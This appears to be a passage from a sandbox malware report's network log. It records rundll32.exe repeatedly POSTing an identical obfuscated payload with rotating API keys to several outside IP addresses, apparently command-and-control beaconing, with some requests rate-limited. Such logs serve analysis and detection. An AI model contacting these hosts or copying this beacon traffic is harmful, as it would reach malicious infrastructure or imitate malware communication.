5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	54549	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:34.493954897 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: dpNYV8M8 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	54550	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:36.172178030 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8SJpmJWP Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	54551	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:36.172923088 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9d3vnjSF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	54552	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:38.030966997 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8PdqczrZ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:38.639513016 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:38 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	54553	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:38.030999899 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: PtrsK9PI Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:38.648513079 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:38 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	54554	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:38.791310072 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: k2R1yoYB Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.7	54555	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:40.500961065 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: PnmtHTnF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	54556	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:42.241359949 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: C7dmrCtH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	54557	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:43.855981112 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: dVSbCRUn Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	54558	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:45.498349905 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: dCjOQwN5 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:46.112219095 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:46 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	54560	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:08.652998924 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: R9LNvhCo Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	54559	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:08.653048992 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: eF4VE4sF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	54562	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:10.399555922 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Nmvki963 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	54561	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:10.399615049 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 4GBcFN1h Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	54563	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:12.149622917 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: lBIrMy44 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	54564	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:12.154911995 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Mj5aWhR3 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	54565	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:13.853741884 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 73hRseql Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	54566	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:13.855485916 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Fc58pzsC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	54567	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:15.481992960 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: OOGR8dqw Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:46:16.086112022 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:46:16 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	54568	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:15.483285904 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QEjtkCEx Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:46:16.087603092 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:46:16 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	54569	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
